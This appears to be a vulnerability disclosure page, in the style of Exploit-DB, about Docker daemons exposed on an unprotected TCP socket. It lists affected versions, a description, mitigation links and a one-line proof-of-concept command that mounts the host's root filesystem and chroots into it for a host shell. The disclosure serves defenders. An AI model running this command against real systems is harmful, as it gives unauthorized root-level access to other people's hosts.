Docker Daemon - Unprotected TCP Socket

vendor:

Docker

by:

Martin Pizala

7,5

CVSS

HIGH

Unauthorized Access

287

CWE

Product Name: Docker

Affected Version From: Since 0.4.7 (2013-06-28)

Affected Version To: Docker CE 17.06.0-ce and Docker Engine 1.13.1

Patch Exists: YES

Related CWE: None

CPE: a:docker:docker

Metasploit: N/A

Other Scripts: N/A

Tags: N/A

CVSS Metrics: N/A

Nuclei References: N/A

Nuclei Metadata: N/A

Platforms Tested: Linux

2017

Docker Daemon – Unprotected TCP Socket

Utilizing Docker via unprotected tcp socket (2375/tcp, maybe 2376/tcp with tls but without tls-auth), an attacker can create a docker container with the '/' path mounted with read/write permissions on the host server that is running the docker container and use chroot to escape the container-jail.

Mitigation:

Protect the tcp socket by using the command line options provided by Docker.

Source

Exploit-DB raw data:

# Exploit Title: Docker Daemon - Unprotected TCP Socket
# Date: 20-07-2017
# Exploit Author: Martin Pizala
# Vendor Homepage: https://www.docker.com
# Software Link: https://www.docker.com/get-docker
# Version: Since 0.4.7 (2013-06-28) (feature: mount host directories)
# Tested on: Docker CE 17.06.0-ce and Docker Engine 1.13.1
 
1. Description

Utilizing Docker via unprotected tcp socket (2375/tcp, maybe 2376/tcp with tls but without tls-auth), an attacker can create a docker container with the '/' path mounted with read/write permissions on the host server that is running the docker container and use chroot to escape the container-jail.

2. Proof of Concept

docker -H tcp://<ip>:<port> run --rm -ti -v /:/mnt alpine chroot /mnt /bin/sh

3. Solution:

Protect the tcp socket
https://docs.docker.com/engine/reference/commandline/dockerd/#bind-docker-to-another-hostport-or-a-unix-socket
https://docs.docker.com/engine/security/https/